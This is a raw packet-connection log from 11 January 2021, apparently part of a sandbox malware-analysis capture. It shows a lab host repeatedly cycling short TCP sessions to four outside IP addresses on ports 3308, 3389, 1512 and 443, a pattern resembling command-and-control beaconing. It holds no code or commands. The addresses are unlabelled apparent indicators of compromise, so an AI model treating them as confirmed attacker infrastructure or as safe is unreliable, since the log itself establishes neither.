Jan 11, 2021 16:53:46.150208950 CET	49332	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:46.193485975 CET	3308	49332	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:46.193617105 CET	49332	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:46.194967985 CET	49332	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:46.238163948 CET	3308	49332	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:46.248759985 CET	3308	49332	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:46.248802900 CET	3308	49332	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:46.248909950 CET	49332	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:46.248960018 CET	49332	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:46.257503986 CET	49332	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:46.302476883 CET	3308	49332	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:46.302587986 CET	49332	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:46.306312084 CET	49332	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:46.306451082 CET	49332	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:46.350425959 CET	3308	49332	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:46.350598097 CET	49332	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:46.391545057 CET	3308	49332	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:46.394213915 CET	3308	49332	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:46.394642115 CET	3308	49332	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:46.505583048 CET	3308	49332	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:46.505630016 CET	3308	49332	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:46.505850077 CET	49332	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:46.510989904 CET	49332	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:46.554351091 CET	3308	49332	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:46.622921944 CET	49333	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:46.677002907 CET	3389	49333	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:46.677154064 CET	49333	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:46.679064989 CET	49333	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:46.732836962 CET	3389	49333	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:46.760255098 CET	3389	49333	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:46.760301113 CET	3389	49333	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:46.760457993 CET	49333	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:46.774331093 CET	49333	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:46.840454102 CET	3389	49333	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:46.840676069 CET	49333	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:46.851038933 CET	49333	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:46.851279020 CET	49333	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:46.904742002 CET	3389	49333	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:46.904923916 CET	49333	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:46.944421053 CET	3389	49333	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:46.958385944 CET	3389	49333	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:46.958404064 CET	3389	49333	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:47.047110081 CET	3389	49333	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:47.047168970 CET	3389	49333	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:47.047445059 CET	49333	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:47.047502041 CET	49333	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:47.054003000 CET	49333	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:47.108123064 CET	3389	49333	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:47.169512987 CET	49334	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:47.222398996 CET	1512	49334	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:47.222472906 CET	49334	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:47.223202944 CET	49334	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:47.276087046 CET	1512	49334	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:47.283184052 CET	1512	49334	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:47.283219099 CET	1512	49334	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:47.283283949 CET	49334	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:47.283328056 CET	49334	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:47.299962044 CET	49334	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:47.365974903 CET	1512	49334	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:47.366246939 CET	49334	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:47.371655941 CET	49334	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:47.371804953 CET	49334	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:47.424863100 CET	1512	49334	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:47.424998999 CET	49334	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:47.461210966 CET	1512	49334	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:47.478471994 CET	1512	49334	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:47.575119019 CET	1512	49334	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:47.575145960 CET	1512	49334	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:47.575325966 CET	49334	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:47.577553034 CET	49334	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:47.630435944 CET	1512	49334	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:47.688452959 CET	49335	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:47.740595102 CET	443	49335	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:47.740760088 CET	49335	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:47.742108107 CET	49335	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:47.796994925 CET	443	49335	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:47.811930895 CET	443	49335	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:47.812083006 CET	49335	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:47.831856966 CET	49335	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:47.886328936 CET	443	49335	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:47.886569023 CET	49335	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:47.897186041 CET	49335	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:47.897542000 CET	49335	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:47.949714899 CET	443	49335	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:47.949835062 CET	49335	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:48.006917000 CET	443	49335	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:48.006978035 CET	443	49335	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:48.124982119 CET	443	49335	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:48.125053883 CET	443	49335	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:48.125345945 CET	49335	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:48.127629042 CET	49335	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:48.179943085 CET	443	49335	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:48.245018005 CET	49336	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:48.288217068 CET	3308	49336	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:48.288402081 CET	49336	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:48.289876938 CET	49336	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:48.332987070 CET	3308	49336	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:48.352790117 CET	3308	49336	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:48.352828979 CET	3308	49336	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:48.352907896 CET	49336	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:48.352952957 CET	49336	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:48.368257046 CET	49336	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:48.413127899 CET	3308	49336	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:48.413374901 CET	49336	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:48.426443100 CET	49336	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:48.426651955 CET	49336	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:48.469779015 CET	3308	49336	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:48.469871998 CET	49336	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:48.510009050 CET	3308	49336	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:48.513015985 CET	3308	49336	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:48.513056993 CET	3308	49336	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:48.626851082 CET	3308	49336	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:48.626905918 CET	3308	49336	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:48.627157927 CET	49336	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:48.632808924 CET	49336	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:48.676040888 CET	3308	49336	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:48.741497993 CET	49337	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:48.795841932 CET	3389	49337	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:48.795970917 CET	49337	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:48.797662973 CET	49337	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:48.851350069 CET	3389	49337	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:48.895951033 CET	3389	49337	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:48.895992041 CET	3389	49337	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:48.896226883 CET	49337	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:48.909568071 CET	49337	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:48.963464975 CET	3389	49337	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:48.970603943 CET	3389	49337	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:48.970871925 CET	49337	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:48.980612040 CET	49337	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:48.980786085 CET	49337	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:49.034619093 CET	3389	49337	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:49.034874916 CET	49337	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:49.074449062 CET	3389	49337	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:49.092226028 CET	3389	49337	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:49.092245102 CET	3389	49337	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:49.184042931 CET	3389	49337	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:49.184087038 CET	3389	49337	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:49.184283972 CET	49337	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:49.184418917 CET	49337	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:49.189806938 CET	49337	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:49.244978905 CET	3389	49337	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:49.302220106 CET	49338	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:49.355382919 CET	1512	49338	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:49.355676889 CET	49338	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:49.357040882 CET	49338	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:49.409974098 CET	1512	49338	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:49.419018984 CET	1512	49338	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:49.419050932 CET	1512	49338	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:49.419167995 CET	49338	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:49.434720993 CET	49338	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:49.488900900 CET	1512	49338	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:49.489054918 CET	49338	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:49.499440908 CET	49338	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:49.499767065 CET	49338	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:49.552699089 CET	1512	49338	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:49.553066969 CET	49338	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:49.588954926 CET	1512	49338	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:49.606194019 CET	1512	49338	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:49.606235027 CET	1512	49338	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:49.705566883 CET	1512	49338	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:49.705627918 CET	1512	49338	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:49.705733061 CET	49338	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:49.711539984 CET	49338	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:49.764543056 CET	1512	49338	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:49.822335958 CET	49339	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:49.874851942 CET	443	49339	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:49.875061035 CET	49339	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:49.876883984 CET	49339	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:49.928970098 CET	443	49339	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:49.944209099 CET	443	49339	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:49.944360971 CET	49339	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:49.960427999 CET	49339	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:50.014889956 CET	443	49339	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:50.015182018 CET	49339	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:50.027026892 CET	49339	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:50.027338028 CET	49339	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:50.079447031 CET	443	49339	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:50.079670906 CET	49339	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:50.118887901 CET	443	49339	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:50.131747007 CET	443	49339	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:50.248336077 CET	443	49339	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:50.248363018 CET	443	49339	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:50.248550892 CET	49339	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:50.253865004 CET	49339	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:50.305850983 CET	443	49339	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:50.366235971 CET	49340	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:50.409425020 CET	3308	49340	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:50.409640074 CET	49340	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:50.411537886 CET	49340	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:50.454804897 CET	3308	49340	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:50.465478897 CET	3308	49340	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:50.465533018 CET	3308	49340	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:50.465614080 CET	49340	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:50.465672970 CET	49340	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:50.480438948 CET	49340	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:50.525309086 CET	3308	49340	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:50.525454044 CET	49340	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:50.530791044 CET	49340	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:50.531043053 CET	49340	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:50.574033976 CET	3308	49340	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:50.574136972 CET	49340	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:50.617291927 CET	3308	49340	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:50.729649067 CET	3308	49340	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:50.729665041 CET	3308	49340	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:50.729813099 CET	49340	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:50.736013889 CET	49340	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:50.779047966 CET	3308	49340	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:50.847455025 CET	49341	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:50.900914907 CET	3389	49341	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:50.901022911 CET	49341	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:50.902189016 CET	49341	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:50.958059072 CET	3389	49341	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:50.979923010 CET	3389	49341	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:50.979938984 CET	3389	49341	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:50.980045080 CET	49341	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:50.988709927 CET	49341	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:51.048445940 CET	3389	49341	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:51.048626900 CET	49341	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:51.054858923 CET	49341	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:51.055032969 CET	49341	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:51.108437061 CET	3389	49341	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:51.108722925 CET	49341	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:51.150979996 CET	3389	49341	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:51.162472963 CET	3389	49341	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:51.162516117 CET	3389	49341	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:51.253209114 CET	3389	49341	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:51.253228903 CET	3389	49341	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:51.253479958 CET	49341	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:51.259134054 CET	49341	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:51.312750101 CET	3389	49341	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:51.376991034 CET	49342	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:51.431658030 CET	1512	49342	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:51.431783915 CET	49342	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:51.433018923 CET	49342	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:51.487535954 CET	1512	49342	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:51.492948055 CET	1512	49342	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:51.493000031 CET	1512	49342	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:51.493052959 CET	49342	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:51.493099928 CET	49342	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:51.503858089 CET	49342	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:51.558892012 CET	1512	49342	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:51.559248924 CET	49342	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:51.569118023 CET	49342	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:51.569581032 CET	49342	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:51.622426033 CET	1512	49342	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:51.622648954 CET	49342	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:51.660801888 CET	1512	49342	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:51.675453901 CET	1512	49342	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:51.777968884 CET	1512	49342	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:51.778028011 CET	1512	49342	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:51.778191090 CET	49342	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:51.784508944 CET	49342	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:51.837434053 CET	1512	49342	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:51.897305012 CET	49343	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:51.949338913 CET	443	49343	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:51.949537039 CET	49343	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:51.950968981 CET	49343	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:52.002835035 CET	443	49343	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:52.017842054 CET	443	49343	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:52.017976999 CET	49343	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:52.037256002 CET	49343	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:52.091377974 CET	443	49343	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:52.091661930 CET	49343	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:52.101414919 CET	49343	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:52.101645947 CET	49343	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:52.153793097 CET	443	49343	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:52.155237913 CET	49343	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:52.191001892 CET	443	49343	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:52.207122087 CET	443	49343	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:52.325000048 CET	443	49343	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:52.325031042 CET	443	49343	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:52.325195074 CET	49343	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:52.330928087 CET	49343	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:52.382788897 CET	443	49343	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:52.443063021 CET	49344	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:52.486251116 CET	3308	49344	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:52.486468077 CET	49344	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:52.488436937 CET	49344	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:52.531657934 CET	3308	49344	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:52.547514915 CET	3308	49344	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:52.547554016 CET	3308	49344	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:52.547615051 CET	49344	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:52.547658920 CET	49344	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:52.561153889 CET	49344	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:52.606957912 CET	3308	49344	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:52.607258081 CET	49344	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:52.617142916 CET	49344	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:52.617449045 CET	49344	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:52.660571098 CET	3308	49344	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:52.660756111 CET	49344	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:52.701033115 CET	3308	49344	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:52.703963995 CET	3308	49344	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:52.704034090 CET	3308	49344	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:52.816457033 CET	3308	49344	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:52.816509962 CET	3308	49344	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:52.816729069 CET	49344	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:52.822796106 CET	49344	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:52.865936041 CET	3308	49344	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:52.942111969 CET	49345	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:52.995794058 CET	3389	49345	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:52.995955944 CET	49345	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:52.997107983 CET	49345	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:53.050340891 CET	3389	49345	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:53.073637009 CET	3389	49345	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:53.073678017 CET	3389	49345	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:53.073723078 CET	49345	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:53.073759079 CET	49345	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:53.078890085 CET	49345	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:53.142657042 CET	3389	49345	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:53.142756939 CET	49345	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:53.146888018 CET	49345	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:53.146950006 CET	49345	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:53.200510025 CET	3389	49345	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:53.200815916 CET	49345	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:53.240236044 CET	3389	49345	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:53.254300117 CET	3389	49345	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:53.254329920 CET	3389	49345	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:53.344810963 CET	3389	49345	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:53.344857931 CET	3389	49345	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:53.345196009 CET	49345	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:53.350835085 CET	49345	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:53.404540062 CET	3389	49345	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:53.472466946 CET	49346	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:53.525351048 CET	1512	49346	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:53.525507927 CET	49346	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:53.527410030 CET	49346	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:53.580210924 CET	1512	49346	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:53.587277889 CET	1512	49346	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:53.587308884 CET	1512	49346	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:53.587378979 CET	49346	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:53.587423086 CET	49346	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:53.604667902 CET	49346	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:53.658668041 CET	1512	49346	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:53.658889055 CET	49346	1512	192.168.2.22	46.105.131.65
